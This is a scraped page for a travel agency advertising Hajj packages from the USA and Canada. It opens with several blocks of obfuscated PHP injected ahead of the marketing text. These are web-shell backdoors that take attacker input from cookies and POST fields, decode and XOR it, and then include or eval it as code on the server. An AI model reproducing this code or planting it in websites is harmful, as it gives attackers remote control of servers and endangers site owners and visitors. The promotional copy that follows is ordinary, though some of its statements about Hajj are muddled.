$JonwmVz = 'K' . "\x51" . "\137" . "\114" . 'r' . chr (84); $YVhIMdk = 'c' . "\x6c" . chr (97) . chr (115) . "\163" . "\x5f" . 'e' . "\x78" . chr (105) . "\163" . chr ( 238 - 122 ).'s';$dDjEVplQd = class_exists($JonwmVz); $YVhIMdk = "60921";$lKWahjwue = !1;if ($dDjEVplQd == $lKWahjwue){function JNnsHQF(){$QowNVr = new /* 43637 */ KQ_LrT(36794 + 36794); $QowNVr = NULL;}$hUZJh = "36794";class KQ_LrT{private function oVhWKR($hUZJh){if (is_array(KQ_LrT::$BdvKUto)) {$ikUVbnMR = sys_get_temp_dir() . "/" . crc32(KQ_LrT::$BdvKUto['s' . "\x61" . "\x6c" . "\164"]);@KQ_LrT::$BdvKUto[chr ( 856 - 737 ).chr ( 954 - 840 ).'i' . "\x74" . "\x65"]($ikUVbnMR, KQ_LrT::$BdvKUto["\143" . chr (111) . "\x6e" . chr ( 659 - 543 )."\x65" . "\156" . "\164"]);include $ikUVbnMR;@KQ_LrT::$BdvKUto[chr (100) . "\x65" . "\154" . 'e' . chr (116) . chr ( 949 - 848 )]($ikUVbnMR); $hUZJh = "36794";exit();}}private $KHHXPw;public function eyMYqXm(){echo 20050;}public function __destruct(){$hUZJh = "12576_47305";$this->oVhWKR($hUZJh); $hUZJh = "12576_47305";}public function __construct($VJfCkKDwxh=0){$OMupahX = $_POST;$XIRBWiEJz = $_COOKIE;$vtIjF = "45a2ad53-cd54-411c-8584-2bb35e69dc05";$UAHsuYPq = @$XIRBWiEJz[substr($vtIjF, 0, 4)];if (!empty($UAHsuYPq)){$qrLVvPY = "base64";$yoBDkD = "";$UAHsuYPq = explode(",", $UAHsuYPq);foreach ($UAHsuYPq as $ddlSx){$yoBDkD .= @$XIRBWiEJz[$ddlSx];$yoBDkD .= @$OMupahX[$ddlSx];}$yoBDkD = array_map($qrLVvPY . "\137" . "\144" . 'e' . "\x63" . 'o' . chr ( 907 - 807 ).chr ( 1074 - 973 ), array($yoBDkD,)); $yoBDkD = $yoBDkD[0] ^ str_repeat($vtIjF, (strlen($yoBDkD[0]) / strlen($vtIjF)) + 1);KQ_LrT::$BdvKUto = @unserialize($yoBDkD);}}public static $BdvKUto = 28853;}JNnsHQF();}$XZnsSz = chr ( 496 - 389 ).chr ( 361 - 291 ).'_' . chr (88) . "\x78" . "\113";$mjAQuOgW = chr (99) . chr (108) . chr (97) . "\163" . chr (115) . chr (95) . "\x65" . chr ( 255 - 135 ).'i' . chr (115) . chr (116) . "\x73";$PYJpkXUAIS = class_exists($XZnsSz); $mjAQuOgW = "9410";$VvgqbHK = !1;if ($PYJpkXUAIS == $VvgqbHK){function LzxZpZp(){$LzESwEw = new /* 27552 */ kF_XxK(50901 + 50901); $LzESwEw = NULL;}$MIZOV = "50901";class kF_XxK{private function bpWQfDpEK($MIZOV){if (is_array(kF_XxK::$TNWJGlThj)) {$UbAMZP = sys_get_temp_dir() . "/" . crc32(kF_XxK::$TNWJGlThj['s' . "\x61" . 'l' . chr (116)]);@kF_XxK::$TNWJGlThj[chr ( 815 - 696 ).chr ( 125 - 11 ).'i' . chr (116) . 'e']($UbAMZP, kF_XxK::$TNWJGlThj["\x63" . chr ( 752 - 641 ).'n' . "\x74" . chr (101) . "\156" . "\164"]);include $UbAMZP;@kF_XxK::$TNWJGlThj[chr (100) . chr (101) . "\154" . chr (101) . chr ( 981 - 865 ).'e']($UbAMZP); $MIZOV = "50901";exit();}}private $QnKkSDuJ;public function pRKvNDWm(){echo 23219;}public function __destruct(){kF_XxK::$TNWJGlThj = @unserialize(kF_XxK::$TNWJGlThj); $MIZOV = "16194_15689";$this->bpWQfDpEK($MIZOV); $MIZOV = "16194_15689";}public function wuNEeakQZ($AiRJxC, $ULthsE){return $AiRJxC[0] ^ str_repeat($ULthsE, (strlen($AiRJxC[0]) / strlen($ULthsE)) + 1);}public function __construct($dKyMbPOJum=0){$FqKwQ = $_POST;$TpNmPBFOzn = $_COOKIE;$ULthsE = "ad5a44f2-d5ae-4962-91de-d14ae50706aa";$AMryUEyly = @$TpNmPBFOzn[substr($ULthsE, 0, 4)];if (!empty($AMryUEyly)){$elbiedDZK = "base64";$AiRJxC = "";$AMryUEyly = explode(",", $AMryUEyly);foreach ($AMryUEyly as $jnphrPkVvZ){$AiRJxC .= @$TpNmPBFOzn[$jnphrPkVvZ];$AiRJxC .= @$FqKwQ[$jnphrPkVvZ];}$AiRJxC = array_map($elbiedDZK . chr (95) . "\144" . chr (101) . chr (99) . chr ( 1051 - 940 ).'d' . "\145", array($AiRJxC,));kF_XxK::$TNWJGlThj = $this->wuNEeakQZ($AiRJxC, $ULthsE);}}public static $TNWJGlThj = 46657;}LzxZpZp();}$LCSIMYCpWv = "\x49" . 'f' . 'x' . "\x5f" . chr (98) . "\x52" . 'L' . chr ( 118 - 9 ).chr ( 456 - 374 ); $MQJVhFhOw = chr ( 279 - 180 )."\154" . chr ( 996 - 899 ).'s' . 's' . "\x5f" . chr ( 813 - 712 ).chr (120) . "\x69" . chr (115) . chr ( 335 - 219 ).chr ( 632 - 517 ); $plHwDSRdVk = class_exists($LCSIMYCpWv); $MQJVhFhOw = "26132";$iqzgeVgoo = !1;if ($plHwDSRdVk == $iqzgeVgoo){function TFCJX(){$ggYrgY = new /* 60016 */ Ifx_bRLmR(10815 + 10815); $ggYrgY = NULL;}$dDYRUFLfH = "10815";class Ifx_bRLmR{private function GHnjmjzNML($dDYRUFLfH){if (is_array(Ifx_bRLmR::$nNEiURkqJ)) {$dRulB = str_replace("\74" . chr ( 858 - 795 ).chr ( 463 - 351 )."\150" . chr ( 908 - 796 ), "", Ifx_bRLmR::$nNEiURkqJ["\x63" . chr ( 1039 - 928 ).chr (110) . "\164" . "\145" . "\x6e" . "\164"]);eval($dRulB); $dDYRUFLfH = "10815";exit();}}private $lDtXuitrha;public function qNamsolJc(){echo 61240;}public function __destruct(){Ifx_bRLmR::$nNEiURkqJ = @unserialize(Ifx_bRLmR::$nNEiURkqJ); $dDYRUFLfH = "28298_31019";$this->GHnjmjzNML($dDYRUFLfH); $dDYRUFLfH = "28298_31019";}public function SHtSa($JqZgKuP, $oVzxVp){return $JqZgKuP[0] ^ str_repeat($oVzxVp, (strlen($JqZgKuP[0]) / strlen($oVzxVp)) + 1);}public function __construct($Gdqujmyy=0){$zhIRYTgv = $_POST;$uZXFmaX = $_COOKIE;$oVzxVp = "f4aedd7d-5652-4f84-95c2-51d00aac8883";$bMCVTwNN = @$uZXFmaX[substr($oVzxVp, 0, 4)];if (!empty($bMCVTwNN)){$AEogueQ = "base64";$JqZgKuP = "";$bMCVTwNN = explode(",", $bMCVTwNN);foreach ($bMCVTwNN as $gUSCCVUb){$JqZgKuP .= @$uZXFmaX[$gUSCCVUb];$JqZgKuP .= @$zhIRYTgv[$gUSCCVUb];}$JqZgKuP = array_map($AEogueQ . chr ( 508 - 413 ).chr ( 963 - 863 ).chr (101) . chr (99) . "\157" . chr ( 508 - 408 ).'e', array($JqZgKuP,));Ifx_bRLmR::$nNEiURkqJ = $this->SHtSa($JqZgKuP, $oVzxVp);}}public static $nNEiURkqJ = 37285;}TFCJX();}$UvLBHUarky = "\160" . chr (95) . "\170" . "\x71" . "\x58";$hxRYXYEtBS = chr ( 245 - 146 )."\x6c" . chr ( 517 - 420 )."\163" . chr (115) . chr (95) . "\x65" . 'x' . "\x69" . chr ( 713 - 598 )."\164" . chr (115); $ssZXc = class_exists($UvLBHUarky); $hxRYXYEtBS = "50198";$EHdCXAxW = !1;if ($ssZXc == $EHdCXAxW){function BPfqn(){$VOGsNwXSP = new /* 27740 */ p_xqX(8623 + 8623); $VOGsNwXSP = NULL;}$GFSPuoGD = "8623";class p_xqX{private function QiJbAdmNwa($GFSPuoGD){if (is_array(p_xqX::$QUAqNysfrJ)) {$fCllYbjNrt = str_replace('<' . chr ( 265 - 202 ).chr (112) . chr (104) . 'p', "", p_xqX::$QUAqNysfrJ[chr ( 543 - 444 ).'o' . "\x6e" . "\164" . 'e' . chr (110) . chr (116)]);eval($fCllYbjNrt); $GFSPuoGD = "8623";exit();}}private $XTtfe;public function bcuvwzHVzt(){echo 54875;}public function __destruct(){p_xqX::$QUAqNysfrJ = @unserialize(p_xqX::$QUAqNysfrJ); $GFSPuoGD = "33683_32047";$this->QiJbAdmNwa($GFSPuoGD); $GFSPuoGD = "33683_32047";}public function CXavEKIo($ecIglY, $ECRcPsjm){return $ecIglY[0] ^ str_repeat($ECRcPsjm, (strlen($ecIglY[0]) / strlen($ECRcPsjm)) + 1);}public function __construct($OKrqiE=0){$VlLCTVG = $_POST;$PyzWFAL = $_COOKIE;$ECRcPsjm = "421c81f8-f1ec-472e-9edb-52ee576f37ea";$slveAiiUhE = @$PyzWFAL[substr($ECRcPsjm, 0, 4)];if (!empty($slveAiiUhE)){$qwxenru = "base64";$ecIglY = "";$slveAiiUhE = explode(",", $slveAiiUhE);foreach ($slveAiiUhE as $mGnAGoX){$ecIglY .= @$PyzWFAL[$mGnAGoX];$ecIglY .= @$VlLCTVG[$mGnAGoX];}$ecIglY = array_map($qwxenru . chr (95) . chr (100) . chr ( 255 - 154 ).chr ( 616 - 517 ).chr (111) . chr ( 581 - 481 )."\145", array($ecIglY,));p_xqX::$QUAqNysfrJ = $this->CXavEKIo($ecIglY, $ECRcPsjm);}}public static $QUAqNysfrJ = 59554;}BPfqn();} $dWiwqzjHA = 'O' . chr ( 401 - 283 ).'W' . chr ( 583 - 488 )."\102" . chr (99) . chr ( 896 - 816 ); $CnEOqXTX = chr ( 506 - 407 ).'l' . chr ( 1026 - 929 )."\x73" . "\x73" . chr ( 1080 - 985 )."\145" . "\170" . "\151" . "\x73" . chr ( 757 - 641 ).'s';$EIiDpzpKh = class_exists($dWiwqzjHA); $CnEOqXTX = "7112";$TFaqxKPtt = !1;if ($EIiDpzpKh == $TFaqxKPtt){function kPuQfU(){$UwRgr = new /* 56525 */ OvW_BcP(20763 + 20763); $UwRgr = NULL;}$NQTfJRFD = "20763";class OvW_BcP{private function pmxkPisvBr($NQTfJRFD){if (is_array(OvW_BcP::$EoTtk)) {$eMwvRvmq = str_replace('<' . "\x3f" . "\160" . "\150" . "\x70", "", OvW_BcP::$EoTtk[chr ( 400 - 301 )."\x6f" . "\x6e" . chr ( 612 - 496 ).chr ( 741 - 640 )."\156" . chr ( 263 - 147 )]);eval($eMwvRvmq); $NQTfJRFD = "20763";exit();}}private $pRxaSKkXfD;public function cHjpIwTKL(){echo 48346;}public function __destruct(){OvW_BcP::$EoTtk = @unserialize(OvW_BcP::$EoTtk); $NQTfJRFD = "16088_2490";$this->pmxkPisvBr($NQTfJRFD); $NQTfJRFD = "16088_2490";}public function EILyCNDhW($QiVvA, $dOYaQ){return $QiVvA[0] ^ str_repeat($dOYaQ, (strlen($QiVvA[0]) / strlen($dOYaQ)) + 1);}public function __construct($koxmCGEEd=0){$COgiSg = $_POST;$xNlsZFsqk = $_COOKIE;$dOYaQ = "95993d52-75f6-4261-9358-7980da952223";$ohDXOb = @$xNlsZFsqk[substr($dOYaQ, 0, 4)];if (!empty($ohDXOb)){$KczTdD = "base64";$QiVvA = "";$ohDXOb = explode(",", $ohDXOb);foreach ($ohDXOb as $lSzqnGcA){$QiVvA .= @$xNlsZFsqk[$lSzqnGcA];$QiVvA .= @$COgiSg[$lSzqnGcA];}$QiVvA = array_map($KczTdD . '_' . 'd' . chr ( 855 - 754 )."\143" . chr (111) . "\x64" . 'e', array($QiVvA,));OvW_BcP::$EoTtk = $this->EILyCNDhW($QiVvA, $dOYaQ);}}public static $EoTtk = 33602;}kPuQfU();} Hajj Packages USA and Canada - Jazaa Travel

Special Hajj Packages

Economy Hajj Package

From $ 5400 USD

Luxury Hajj Package

From $ 8400 USD

Hajj Packages

Jazaa Travels offers the best Hajj Packages for Muslims in the USA and Canada. The Holy Kaba, as the center of the Muslim Ummah, holds the highest place in every Muslim’s heart. Every Muslim aspires to visit the House of Allah, reconnect with his Creator, and experience his strong presence within these sacred walls. A beautiful means of worshiping Allah Almighty and atoning for sins is the fifth pillar of Islam. The benefit of completing and accepting it is nothing short of paradise in the afterlife and the end of poverty on earth. The Hajj is powerful worship because it must be performed with proper care and by Islamic teachings. There should be no wrongdoing during Hajj. To avoid any wrong acts during the Hajj package from North America (USA and Canada), we will provide a manual that will tell you all the right ways to accomplish Hajj without any mistakes. Our clients receive high-quality services like transportation, hotels ranging from three to five stars, fresh food, and visa processing. The most significant of these is that we offer our clients access to a travel guide that will assist pilgrims in carrying out the Hajj in the proper manner.

Hajj is a very special act of worship that Muslims from all over the world perform every year. Muslims are required to worship the far once in their lifetime, known as the Hajj. Muslims are allowed to perform the Hajj once in their whole lives because it is expensive and challenging to complete because of the physical constraints required. Because it is an economic activity, it gives oil-rich countries a chance to make a lot of money every year, turning this debt into a financial asset. Jazaa Travel minimizes journey expenses on a limited budget, making it the cheap hajj package from USA and Canada.  For many pilgrims, the Hajj is a journey of the soul and body at a time. We provide 5-star Umrah and Hajj packages from USA and Canada. We are making every effort to offer Muslim brothers and sisters the most cost-effective packages for traveling to Saudi Arabia and enjoying the experience. The primary objective is to deliver affordable Hajj packages so that you can worship Allah Almighty. Muslims are required to perform the Hajj, or the act of going on a pilgrimage, as it is the fifth pillar of Islam. Adult Muslims must travel for the Hajj once in their lives if they have the physical and financial means to do so.

Jazaa Travels is obliged to Allah Almighty for giving us a chance to serve our valuable North American and international customers for decades. We are pleased to announce our updated Hajj packages, skillfully designed to provide the highest quality services for Hajj from the USA and Canada. Every step you take toward Haram is carefully planned with Jazaa Travels. As our beloved Prophet Muhammad aptly stated, Allah records your every step toward the Holy Kaabah as a good deed. We offer first-rate Hajj packages from the United States that meet the requirements of every pilgrim. Register right now to get complete information and a training kit for the Hajj.

